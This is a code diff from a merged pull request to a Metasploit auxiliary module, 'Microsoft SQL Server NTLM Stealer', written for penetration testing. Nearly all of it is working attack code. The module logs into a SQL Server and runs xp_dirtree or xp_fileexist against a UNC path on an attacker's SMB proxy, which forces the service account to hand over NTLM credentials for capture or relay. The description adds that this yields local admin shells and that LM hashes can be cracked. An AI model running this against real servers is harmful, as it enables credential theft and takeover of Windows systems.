Merge pull request #1 from jvazquez-r7/nullbind_test1
Looks good and works as excepted. Thanks for the updates! - jvazquez-r7 did some nice clean upunstable
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@ -4,29 +4,25 @@ class Metasploit3 < Msf::Auxiliary
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include Msf::Exploit::Remote::MSSQL
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include Msf::Auxiliary::Scanner
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include Rex::Text
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def initialize(info = {})
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super(update_info(info,
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'Name' => 'Microsoft SQL Server NTLM Stealer',
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'Description' => %q{
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This module can be used to help capture or relay the LM/NTLM
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credentials of the account running the remote SQL Server service.
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The module will use the supplied credentials to connect to the
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target SQL Server instance and execute the native "xp_dirtree" or
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"xp_fileexist" stored procedure. The stored procedures will then
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force the service account to authenticate to the system defined in
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the SMBProxy option. In order for the attack to be successful, the
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SMB capture or relay module must be running on the system defined
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as the SMBProxy. The database account used to connect to the
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database should only require the "PUBLIC" role to execute.
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Successful execution of this attack usually results in local
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administrative access to the Windows system. Specifically, this
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works great for relaying credentials between two SQL Servers using
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a shared service account to get shells. However, if the relay fails,
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then the LM hash can be reversed using the Halflm rainbow tables and
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john the ripper. Thanks to "Sh2kerr" who wrote the ora_ntlm_stealer
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for the inspiration.
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This module can be used to help capture or relay the LM/NTLM credentials of the
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account running the remote SQL Server service. The module will use the supplied
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credentials to connect to the target SQL Server instance and execute the native
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"xp_dirtree" or "xp_fileexist" stored procedure. The stored procedures will then
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force the service account to authenticate to the system defined in the SMBProxy
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option. In order for the attack to be successful, the SMB capture or relay module
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must be running on the system defined as the SMBProxy. The database account used
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to connect to the database should only require the "PUBLIC" role to execute.
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Successful execution of this attack usually results in local administrative access
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to the Windows system. Specifically, this works great for relaying credentials
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between two SQL Servers using a shared service account to get shells. However, if
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the relay fails, then the LM hash can be reversed using the Halflm rainbow tables
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and john the ripper. Thanks to "Sh2kerr" who wrote the ora_ntlm_stealer for the
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inspiration.
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},
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'Author' => [ 'nullbind <scott.sutherland[at]netspi.com>' ],
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'License' => MSF_LICENSE,
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@ -45,43 +41,39 @@ class Metasploit3 < Msf::Auxiliary
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# Reminder
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print_status("DONT FORGET to run a SMB capture or relay module!")
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# Set default result (fail)
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result = 0
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# Call auth_force method to execute "xp_dirtree"
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result = force_auth("xp_dirtree",datastore['SMBPROXY'],rhost,rport)
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begin
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force_auth("xp_dirtree",datastore['SMBPROXY'])
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return
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rescue
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print_error("xp_dirtree failed to initiate authentication to smbproxy.")
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end
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# Call auth_force method to execute "xp_fileexist" if "xp_dirtree" fails
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if result == 0 then
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force_auth("xp_fileexist",datastore['SMBPROXY'],rhost,rport)
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begin
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force_auth("xp_fileexist",datastore['SMBPROXY'])
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return
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rescue
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print_error("xp_fileexist failed to initiate authentication to smbproxy.")
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end
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end
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# --------------------------------------------
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# Method to force sql server to authenticate
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# --------------------------------------------
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def force_auth(sprocedure,smbproxy,vic,vicport)
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def force_auth(sprocedure,smbproxy)
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print_status("Forcing SQL Server at #{vic} to auth to #{smbproxy} via #{sprocedure}...")
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print_status("Forcing SQL Server at #{rhost} to auth to #{smbproxy} via #{sprocedure}...")
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# Generate random file name
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rand_filename = Rex::Text.rand_text_alpha(8, bad='')
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# Setup query
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sql = "#{sprocedure} '\\\\#{smbproxy}\\#{rand_filename}'"
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result = mssql_query(sql, false) if mssql_login_datastore
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column_data = result[:rows]
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print_good("Successfully executed #{sprocedure} on #{rhost}")
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print_good("Go check your SMB relay or capture module for goodies!")
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# Execute query
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begin
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result = mssql_query(sql, false) if mssql_login_datastore
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column_data = result[:rows]
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print_good("Successfully executed #{sprocedure} on #{rhost}")
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print_good("Go check your SMB relay or capture module for goodies!")
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return 1
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rescue
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print_error("#{sprocedure} failed to initiate authentication to smbproxy.")
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return 0
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end
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end
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end
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